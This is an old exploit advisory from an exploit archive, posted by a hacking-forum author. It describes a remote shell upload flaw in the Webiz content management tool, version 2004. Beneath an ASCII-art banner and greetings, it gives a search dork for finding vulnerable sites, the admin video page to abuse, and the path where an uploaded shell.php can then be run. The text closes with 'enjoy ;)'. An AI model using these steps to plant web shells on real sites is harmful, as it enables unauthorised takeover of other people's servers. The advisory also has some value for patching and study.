# Exploit Title: (Webiz) local SHELL Upload Vulnerability # Date: 23-05-2010 # Author: kannibal615 # Software Link: N/A # Version: 2004 # Tested on: PHP # CVE : N/A # Code : @@ @@ @@@@@@ @@ @@ @@@@ @@@@@@@ @@ @@ @@@@@@@ @@@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@@ @@@@@@@@ @@ @@ @@ @@@@ @@@@@@ @@ @@ @@ @@ @@ @@@ @@@@@@@@ @@@@@@@@ @@ @@ @@ @@@@@@ @@ @@ @@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@@@ @@ @@ @@ @@ @@@@@@@ @@ @@ @@@@@@@ @@ @@ dot NET KANNIBAL615 ========================================================================= WEBIZ REMOTE SHELL UPLOAD VULNERABILITY ========================================================================= BY KANNIBAL615 ========================================================================= == Found By : kannibal615 == website : www.vbhacker.net/vb == email : zn[at]live[dot]de == == Thanks to : THE PIRATOR == : Pc-InSeCt / emptyzero == : DAK / l3G3NDS / m0j4h3d == : V!Ru$_T4ckJ3n / __MiM0__ == : ruqa / PrideArabs / DIESEL == : yassine_hell / mu$lim == : ALL VBHACKER MEMBERS ========================================================================= EXPLOIT ========================================================================= == CMS : Web content Management Tool [ wmt ] == version : 2004 == risk : hight == dork : Powered by Webiz == Rating : ***** == == ------------------------------------------- == *** YOU MUST HAVE A ADMINISTRATOR RIGHT *** == ------------------------------------------- == == BUG == ../wmt/siteadmin/videos.php == == == == PHP file Upload == == == == upload your shell from here == http://[localhost]/wmt/siteadmin/videos.php >> shell.php == == == == Get it == http://[localhost]/wmt/userfiles/Media/videos/shell.php == == == == enjoy ;) == == kannibal615 Copyright 2010 == == www.vbhacker.net/vb ==========================================================================